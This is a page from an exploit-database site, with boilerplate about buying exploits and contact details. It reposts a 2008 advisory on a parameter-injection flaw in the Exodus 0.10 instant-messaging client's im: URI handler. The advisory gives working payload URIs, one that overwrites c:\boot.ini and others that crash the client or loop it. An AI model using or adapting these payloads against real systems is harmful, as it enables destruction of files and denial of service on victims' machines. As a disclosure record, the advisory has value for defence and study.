0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability

Author

Nine:Situations:Group

Risk

[

Security Risk Unsored

]

0day-ID

0day-ID-9306

Category

remote exploits

Date add

17-11-2008

Platform

unsorted

=====================================================================
Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability
=====================================================================

--------------------------------------------------------------------------------
Exodus v0.10 uri handler arbitrary parameter injection
by Nine:Situations:Group::strawdog
tested against IE8b/xpsp3
may not work against non-English systems because of an installation bug
--------------------------------------------------------------------------------
software site: http://code.google.com/p/exodus/
description:
Exodus is a free software instant messaging client developed by Peter
Millard and written in Borland Delphi that can connect to Jabber servers
and exchange messages with other Jabber users. Currently, binaries are
only available for Microsoft Windows. Exodus was designed as the official
successor of the Winjab client, as Winjab was a personal project that
was becoming too difficult to maintain[..]
--------------------------------------------------------------------------------

reg key:
HKEY_CLASSES_ROOT\im\shell\Open\command
C:\Program Files\Exodus\Exodus.exe -u '%1'
--------------------------------------------------------------------------------
it's possible to inject arbitrary command line parameters, ex. this shows
the argument list:
im:///'%20-?

this overwrites an arbitrary file:
im:///'%20-l%20c:\boot.ini%20-v

now boot.ini looks like this:
[2008-11-17 13.50.41.437]  Trying to setup the Auto Away timer.
[2008-11-17 13.50.41.453]  Using Win32 API for Autoaway checks!!
--------------------------------------------------------------------------------
todo:
investigate this even:
im:///'%20-c%20[A*300]

this will cause an infinite loop trough multiple unhandled exceptions
and this:
im:///'%20-c%20file:///aaaa%20
crash exodus.exe
--------------------------------------------------------------------------------
our site ---------------------------------------> http://retrogod.altervista.org



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Exodus 0.10 (uri handler) Arbitrary Parameter Injection Vulnerability

Report Error

Report Error